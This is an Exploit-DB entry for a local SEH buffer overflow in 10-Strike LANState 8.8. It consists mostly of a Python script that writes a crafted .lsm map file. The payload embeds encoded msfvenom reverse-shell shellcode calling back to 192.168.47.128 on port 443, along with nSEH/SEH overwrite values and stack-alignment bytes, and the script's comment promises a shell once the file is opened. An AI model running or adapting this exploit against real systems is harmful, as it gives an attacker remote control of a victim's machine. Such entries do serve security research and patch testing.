10-Strike LANState 8.8 - Local Buffer Overflow (SEH)

EDB-ID: 45086
Author: absolomb
Published: 2018-07-25
CVE: N/A
Type: Local
Platform: Windows
Vulnerable App: N/A

 # Date: 2018-07-24 
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# Software Link: https://www.10-strike.com/lanstate/download.shtml
# Version 8.8
# Tested on: Windows 7 SP 1 x86

# Open LANState, File -> Open, browse to generated lsm file, boom shell.
# If it doesn't work first try, close the tab at the bottom and reopen the file

#!/usr/bin/python

lsm = """[VERSION INFO]
PROG_NAME=LANState
PROG_VER=8.85
MAP_VER=8.3
MAPID=584636991

[OBJECT#4]
index=4
ObjName=
ObjCaption={0}
ObjHint=
ObjLink=
POS_X=100
POS_Y=0
Width=65
Height=65
ImageWidth=31
ImageHeight=32
StdImageIndex=1
ImageFilePath=
FontName=Arial
FontColor=0
FontSize=8
FontCharset=1
FontStyle=0
TextAlignment=2
TextLayout=0
ObjType=1
OBJ_ID=1
TYPE_ID=2
IP=
REMOTE_NAME=A
MAP_NAME=
MAC_ADDR=
OS=
SNMPAgent=0
SNMPVer=1
SNMPUname=
SNMPPassw=
SNMPPrivPassw=
SNMPSecLevel=0
SNMPAuthType=0
SNMPPrivType=0
Community=
ALWAYS_ON=0
ImageEnabled=0
ImageFile=
IPList=
CurrentUser=
DESCRIPT=
CheckInterval=60
DownTime1=0
DownTime1Start=12:00:00 AM
DownTime1Finish=12:00:00 AM
DownTime2=0
DownTime2Start=12:00:00 AM
DownTime2Finish=12:00:00 AM
DownTime3=0
DownTime3Start=12:00:00 AM
DownTime3Finish=12:00:00 AM
DownTime4=0
DownTime4Start=12:00:00 AM
DownTime4Finish=12:00:00 AM
DownTime5=0
DownTime5Start=12:00:00 AM
DownTime5Finish=12:00:00 AM
DownTime6=0
DownTime6Start=12:00:00 AM
DownTime6Finish=12:00:00 AM
DownTime7=0
DownTime7Start=12:00:00 AM
DownTime7Finish=12:00:00 AM
DTDoNotAlert=1
RunFirstOnly=0
FirstIsPassed=1
CHECK#0/HostAddr={0}
CHECK#0/CID=1
CHECK#0/NumRetries=1
CHECK#0/RetInterval=30
CHECK#0/IsMainCheck=0
CHECK#0/KeepStat=1
CHECK#0/CheckType=0
CHECK#0/CheckOn=1
CHECK#0/CheckRTTime=0
CHECK#0/RTTime=1000
CHECK#0/PacketsCount=4
CHECK#0/TimeOut=500
CHECK#0/SizeBuf=32

[VIEW]
FonImage=0
FonImageFile=
ImagePosition=0
ImageOffsetX=16
ImageOffsetY=16
ImgW=0
ImgH=0
ImgAutoSize=1
ScaleFactor=1
ScrollX=0
ScrollY=0
BkGroundColor=16777215
FontName=Arial
FontColor=-16777208
FontSize=8
FontCharset=1
FontStyle=0
Gradient=0
Color1=15780518
Color2=16777215
WebUseSmallIcons=0
CurIconSize=32
LockAreas=0
LockLines=0
LockHosts=0
WindowState=2
WindowTop=-10
WindowsLeft=12
WindowWidth=800
WindowsHeight=600

"""

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode
shellcode = ""
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x49\x6c\x6b\x58\x4f\x72\x57\x70"
shellcode += "\x47\x70\x77\x70\x75\x30\x6c\x49\x69\x75\x45\x61"
shellcode += "\x4b\x70\x71\x74\x4c\x4b\x62\x70\x64\x70\x4e\x6b"
shellcode += "\x62\x72\x54\x4c\x6e\x6b\x71\x42\x65\x44\x4c\x4b"
shellcode += "\x70\x72\x34\x68\x64\x4f\x4d\x67\x62\x6a\x76\x46"
shellcode += "\x56\x51\x79\x6f\x6e\x4c\x65\x6c\x75\x31\x71\x6c"
shellcode += "\x44\x42\x74\x6c\x61\x30\x59\x51\x7a\x6f\x64\x4d"
shellcode += "\x47\x71\x58\x47\x49\x72\x6a\x52\x66\x32\x62\x77"
shellcode += "\x6e\x6b\x50\x52\x56\x70\x6e\x6b\x53\x7a\x77\x4c"
shellcode += "\x4c\x4b\x50\x4c\x46\x71\x73\x48\x38\x63\x62\x68"
shellcode += "\x37\x71\x78\x51\x30\x51\x6e\x6b\x73\x69\x75\x70"
shellcode += "\x67\x71\x78\x53\x4e\x6b\x77\x39\x64\x58\x68\x63"
shellcode += "\x75\x6a\x37\x39\x4c\x4b\x55\x64\x4e\x6b\x35\x51"
shellcode += "\x6a\x76\x74\x71\x6b\x4f\x6c\x6c\x6f\x31\x7a\x6f"
shellcode += "\x56\x6d\x75\x51\x4a\x67\x75\x68\x4d\x30\x30\x75"
shellcode += "\x78\x76\x43\x33\x53\x4d\x68\x78\x37\x4b\x61\x6d"
shellcode += "\x65\x74\x44\x35\x4a\x44\x30\x58\x4c\x4b\x62\x78"
shellcode += "\x31\x34\x35\x51\x4b\x63\x31\x76\x6c\x4b\x46\x6c"
shellcode += "\x72\x6b\x6e\x6b\x66\x38\x35\x4c\x35\x51\x6b\x63"
shellcode += "\x6c\x4b\x74\x44\x6c\x4b\x53\x31\x78\x50\x6e\x69"
shellcode += "\x73\x74\x44\x64\x35\x74\x43\x6b\x63\x6b\x51\x71"
shellcode += "\x32\x79\x50\x5a\x73\x61\x79\x6f\x79\x70\x31\x4f"
shellcode += "\x33\x6f\x51\x4a\x6e\x6b\x45\x42\x7a\x4b\x4c\x4d"
shellcode += "\x43\x6d\x73\x58\x57\x43\x67\x42\x55\x50\x43\x30"
shellcode += "\x51\x78\x42\x57\x42\x53\x66\x52\x71\x4f\x66\x34"
shellcode += "\x45\x38\x72\x6c\x73\x47\x57\x56\x37\x77\x49\x6f"
shellcode += "\x7a\x75\x68\x38\x7a\x30\x43\x31\x43\x30\x33\x30"
shellcode += "\x36\x49\x4a\x64\x73\x64\x62\x70\x30\x68\x44\x69"
shellcode += "\x4d\x50\x30\x6b\x37\x70\x69\x6f\x59\x45\x62\x70"
shellcode += "\x42\x70\x76\x30\x30\x50\x61\x50\x62\x70\x57\x30"
shellcode += "\x46\x30\x51\x78\x78\x6a\x54\x4f\x49\x4f\x6b\x50"
shellcode += "\x6b\x4f\x4a\x75\x4a\x37\x53\x5a\x57\x75\x42\x48"
shellcode += "\x39\x50\x69\x38\x36\x4f\x4b\x30\x50\x68\x34\x42"
shellcode += "\x65\x50\x65\x51\x4d\x6b\x6c\x49\x39\x76\x33\x5a"
shellcode += "\x36\x70\x72\x76\x76\x37\x31\x78\x7a\x39\x4d\x75"
shellcode += "\x52\x54\x61\x71\x59\x6f\x79\x45\x6b\x35\x39\x50"
shellcode += "\x62\x54\x34\x4c\x39\x6f\x50\x4e\x77\x78\x62\x55"
shellcode += "\x78\x6c\x53\x58\x48\x70\x4c\x75\x39\x32\x76\x36"
shellcode += "\x59\x6f\x58\x55\x70\x68\x53\x53\x52\x4d\x62\x44"
shellcode += "\x43\x30\x4e\x69\x6a\x43\x71\x47\x71\x47\x61\x47"
shellcode += "\x64\x71\x39\x66\x50\x6a\x34\x52\x33\x69\x42\x76"
shellcode += "\x38\x62\x4b\x4d\x51\x76\x4a\x67\x51\x54\x75\x74"
shellcode += "\x47\x4c\x56\x61\x46\x61\x6c\x4d\x37\x34\x57\x54"
shellcode += "\x54\x50\x7a\x66\x65\x50\x42\x64\x50\x54\x52\x70"
shellcode += "\x73\x66\x71\x46\x31\x46\x37\x36\x32\x76\x42\x6e"
shellcode += "\x33\x66\x71\x46\x62\x73\x61\x46\x32\x48\x50\x79"
shellcode += "\x38\x4c\x45\x6f\x4d\x56\x6b\x4f\x79\x45\x4f\x79"
shellcode += "\x49\x70\x52\x6e\x62\x76\x37\x36\x4b\x4f\x34\x70"
shellcode += "\x65\x38\x57\x78\x6e\x67\x65\x4d\x35\x30\x69\x6f"
shellcode += "\x58\x55\x4d\x6b\x5a\x50\x4f\x45\x69\x32\x33\x66"
shellcode += "\x42\x48\x6d\x76\x6c\x55\x4d\x6d\x4f\x6d\x49\x6f"
shellcode += "\x4a\x75\x75\x6c\x43\x36\x63\x4c\x67\x7a\x6f\x70"
shellcode += "\x6b\x4b\x6b\x50\x43\x45\x56\x65\x6f\x4b\x43\x77"
shellcode += "\x62\x33\x73\x42\x72\x4f\x33\x5a\x55\x50\x63\x63"
shellcode += "\x79\x6f\x6e\x35\x41\x41"

align_stack = '\x58' # POP EAX
align_stack += '\x58' # POP EAX
align_stack += '\x05\x61\x55\x55\x55' # ADD EAX,55555561
align_stack += '\x05\x61\x55\x55\x55' # ADD EAX,55555561
align_stack += '\x05\x62\x56\x55\x55' # ADD EAX,55555662
align_stack += '\x50' # PUSH EAX
align_stack += '\x5f' # POP EDI

# JMP always true
nseh = '\x71\x06\x70\x04'

#01BA7647 POP POP RET LANState.exe
seh = '\x47\x76\xba\x01'

payload = '\x41' * 235
payload += nseh
payload += seh
payload += align_stack
payload += '\x41' * 265
payload += shellcode
payload += '\x41' * (3492 -len(shellcode + align_stack))

buffer = lsm.format(payload)

file = open('sploit.lsm','w')
print "Size: " + str(len(payload)) + " bytes"
file.write(buffer)
file.close()
print "Map file created!"

Related Posts